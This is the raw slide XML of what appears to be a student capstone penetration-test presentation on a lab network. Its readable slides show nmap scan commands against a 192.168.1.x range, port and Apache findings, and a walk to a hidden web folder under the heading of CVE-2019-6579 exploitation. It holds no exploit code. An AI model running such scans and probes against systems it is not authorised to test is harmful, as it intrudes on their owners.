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1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId31"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="278" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="280" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="281" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="283" r:id="rId17"/>
    <p:sldId id="266" r:id="rId18"/>
    <p:sldId id="267" r:id="rId19"/>
    <p:sldId id="284" r:id="rId20"/>
    <p:sldId id="268" r:id="rId21"/>
    <p:sldId id="269" r:id="rId22"/>
    <p:sldId id="270" r:id="rId23"/>
    <p:sldId id="271" r:id="rId24"/>
    <p:sldId id="272" r:id="rId25"/>
    <p:sldId id="273" r:id="rId26"/>
    <p:sldId id="274" r:id="rId27"/>
    <p:sldId id="275" r:id="rId28"/>
    <p:sldId id="276" r:id="rId29"/>
    <p:sldId id="277" r:id="rId30"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="02000000000000000000"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9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="2232">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>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9E8A0B8-D548-4F6C-8B6F-CEB10D1B410B}">
  <a:tblStyle styleId="{39E8A0B8-D548-4F6C-8B6F-CEB10D1B410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5" d="100"/>
          <a:sy n="145" d="100"/>
        </p:scale>
        <p:origin x="114" y="1086"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="2232"/>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8798eb4c4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8798eb4c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8623a2be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8623a2be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6585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8623a2be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8623a2be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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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2090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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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1554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8623a2bef4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8623a2bef4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76447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8798eb4c4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8798eb4c4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8623a2bef4_1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8623a2bef4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8623a2bef4_1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8623a2bef4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946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8623a2bef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8623a2bef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8623a2bef4_1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8623a2bef4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8623a2bef4_1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8623a2bef4_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8623a2bef4_1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8623a2bef4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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c4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8798eb4c44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8798eb4c4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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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 name="Google Shape;1244;g8798eb4c44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80f7e6291e_1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80f7e6291e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8798eb4c4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8798eb4c4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8798eb4c44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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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1157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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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33842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7" name="Google Shape;447;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48" name="Google Shape;448;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0" name="Google Shape;450;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1" name="Google Shape;451;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="33018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2" name="Google Shape;452;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="2688300" cy="4767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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="4767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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="33018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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;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9" name="Google Shape;459;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0" name="Google Shape;460;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1" name="Google Shape;461;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63" name="Google Shape;463;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4" name="Google Shape;464;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0" name="Google Shape;480;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1" name="Google Shape;481;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 name="Google Shape;482;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3" name="Google Shape;483;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8" name="Google Shape;488;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9" name="Google Shape;489;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1" name="Google Shape;491;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2" name="Google Shape;492;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3" name="Google Shape;493;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7" name="Google Shape;497;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8" name="Google Shape;498;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99" name="Google Shape;499;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6" name="Google Shape;506;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7" name="Google Shape;507;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8" name="Google Shape;508;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0" name="Google Shape;510;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1" name="Google Shape;511;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 name="Google Shape;512;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6" name="Google Shape;516;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7" name="Google Shape;517;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18" name="Google Shape;518;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5" name="Google Shape;525;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6" name="Google Shape;526;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7" name="Google Shape;527;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9" name="Google Shape;529;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0" name="Google Shape;530;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1" name="Google Shape;531;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5" name="Google Shape;535;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6" name="Google Shape;536;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37" name="Google Shape;537;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4" name="Google Shape;544;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45" name="Google Shape;545;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46" name="Google Shape;546;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48" name="Google Shape;548;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9" name="Google Shape;549;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0" name="Google Shape;550;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4" name="Google Shape;554;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5" name="Google Shape;555;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56" name="Google Shape;556;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3" name="Google Shape;563;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64" name="Google Shape;564;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65" name="Google Shape;565;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67" name="Google Shape;567;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8" name="Google Shape;568;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9" name="Google Shape;569;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3" name="Google Shape;573;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77" name="Google Shape;577;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5" name="Google Shape;585;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86" name="Google Shape;586;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87" name="Google Shape;587;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89" name="Google Shape;589;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0" name="Google Shape;590;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1" name="Google Shape;591;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5" name="Google Shape;595;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6" name="Google Shape;596;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99" name="Google Shape;599;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7" name="Google Shape;607;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8" name="Google Shape;608;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09" name="Google Shape;609;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1" name="Google Shape;611;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2" name="Google Shape;612;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3" name="Google Shape;613;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7" name="Google Shape;617;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8" name="Google Shape;618;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1" name="Google Shape;621;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9" name="Google Shape;629;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0" name="Google Shape;630;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1" name="Google Shape;631;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3" name="Google Shape;633;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4" name="Google Shape;634;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5" name="Google Shape;635;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3" name="Google Shape;643;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1" name="Google Shape;651;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2" name="Google Shape;652;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53" name="Google Shape;653;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5" name="Google Shape;655;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6" name="Google Shape;656;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7" name="Google Shape;657;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5" name="Google Shape;665;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6" name="Google Shape;666;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7" name="Google Shape;667;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6" name="Google Shape;676;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7" name="Google Shape;677;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78" name="Google Shape;678;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0" name="Google Shape;680;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0" name="Google Shape;690;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1" name="Google Shape;691;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2" name="Google Shape;692;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2" name="Google Shape;702;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03" name="Google Shape;703;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05" name="Google Shape;705;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6" name="Google Shape;706;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7" name="Google Shape;707;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5" name="Google Shape;715;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6" name="Google Shape;716;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17" name="Google Shape;717;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27" name="Google Shape;727;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28" name="Google Shape;728;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0" name="Google Shape;730;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1" name="Google Shape;731;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2" name="Google Shape;732;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0" name="Google Shape;740;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1" name="Google Shape;741;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2" name="Google Shape;742;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1" name="Google Shape;751;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2" name="Google Shape;752;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3" name="Google Shape;753;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55" name="Google Shape;755;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6" name="Google Shape;756;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7" name="Google Shape;757;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9" name="Google Shape;759;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1" name="Google Shape;761;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7" name="Google Shape;767;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69" name="Google Shape;769;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9" name="Google Shape;77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0" name="Google Shape;78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1" name="Google Shape;781;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3" name="Google Shape;783;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4" name="Google Shape;784;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5" name="Google Shape;785;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7" name="Google Shape;787;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9" name="Google Shape;789;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3" name="Google Shape;793;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5" name="Google Shape;795;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7" name="Google Shape;797;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7" name="Google Shape;807;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08" name="Google Shape;808;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09" name="Google Shape;809;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1" name="Google Shape;811;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2" name="Google Shape;812;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3" name="Google Shape;813;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5" name="Google Shape;815;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7" name="Google Shape;817;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1" name="Google Shape;821;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3" name="Google Shape;823;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5" name="Google Shape;825;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5" name="Google Shape;835;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6" name="Google Shape;836;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37" name="Google Shape;837;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9" name="Google Shape;839;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0" name="Google Shape;840;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1" name="Google Shape;841;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5" name="Google Shape;845;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3" name="Google Shape;853;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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Google Shape;861;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2" name="Google Shape;862;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3" name="Google Shape;863;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64" name="Google Shape;864;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6" name="Google Shape;866;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1" name="Google Shape;871;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3" name="Google Shape;873;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5" name="Google Shape;875;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7" name="Google Shape;877;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9" name="Google Shape;879;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1" name="Google Shape;881;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3" name="Google Shape;883;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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;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3" name="Google Shape;893;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94" name="Google Shape;894;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95" name="Google Shape;895;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7" name="Google Shape;897;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8" name="Google Shape;898;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2" name="Google Shape;902;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4" name="Google Shape;904;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6" name="Google Shape;906;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8" name="Google Shape;908;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0" name="Google Shape;910;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2" name="Google Shape;912;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14" name="Google Shape;914;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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923;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25" name="Google Shape;925;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26" name="Google Shape;926;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28" name="Google Shape;928;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9" name="Google Shape;929;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3" name="Google Shape;933;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5" name="Google Shape;935;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7" name="Google Shape;937;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9" name="Google Shape;939;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1" name="Google Shape;941;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3" name="Google Shape;943;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45" name="Google Shape;945;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53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;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5" name="Google Shape;955;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56" name="Google Shape;956;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57" name="Google Shape;957;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59" name="Google Shape;959;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0" name="Google Shape;960;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4" name="Google Shape;964;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6" name="Google Shape;966;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8" name="Google Shape;968;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0" name="Google Shape;970;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2" name="Google Shape;972;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4" name="Google Shape;974;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76" name="Google Shape;976;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86" name="Google Shape;986;p48"/>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7" name="Google Shape;987;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88" name="Google Shape;988;p4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94" name="Google Shape;994;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5" name="Google Shape;995;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6" name="Google Shape;996;p49"/>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998"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="999" name="Google Shape;999;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01"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;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1011"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p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5817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21.png"/><Relationship Id="rId7"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35.png"/><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7.png"/><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8.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54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="170392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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p5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Exploitation: Open Web Port (80) CVE-2019-6579</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;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sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;p61"/>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1"/>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dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1"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I used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to scan the network and look at open ports and versions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –A 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1094" name="Google Shape;1094;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095" name="Google Shape;1095;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61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Google Shape;1097;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098" name="Google Shape;1098;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9" name="Google Shape;1099;p61"/>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1"/>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dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1"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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap scanned 256 IP addresses and found 4 hosts up. Port 22 a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 80 looked interesting on 192.168.1.105 which was also using Apache services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200"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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The discovered files on meet_our_team/ashton.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Which lead us to the secret folder: /company_folders/secret_fodler</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;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03" name="Google Shape;1103;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4" name="Google Shape;1104;p61"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="23715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a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>[INSERT: screenshot or command output illustrating the exploit.]</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D024462E-8A39-B7AB-0273-A22388981ECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6048226" y="1527455"/>
            <a:ext cx="3108073" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2726145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Exploitation: Open Web Port (80) CVE-2019-6579</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="224041" y="817242"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;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rgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1103" name="Google Shape;1103;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4" name="Google Shape;1104;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="224041" y="1365253"/>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Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD8CF64-C0C6-4752-4249-233A0045D0DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1345392"/>
            <a:ext cx="3777451" cy="3571258"/>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907C675A-CC47-6FB6-16C0-E55B4BC830A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3789751" y="670343"/>
            <a:ext cx="4677255" cy="2054832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4915F50-2176-9865-B8CA-8B3386258C7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
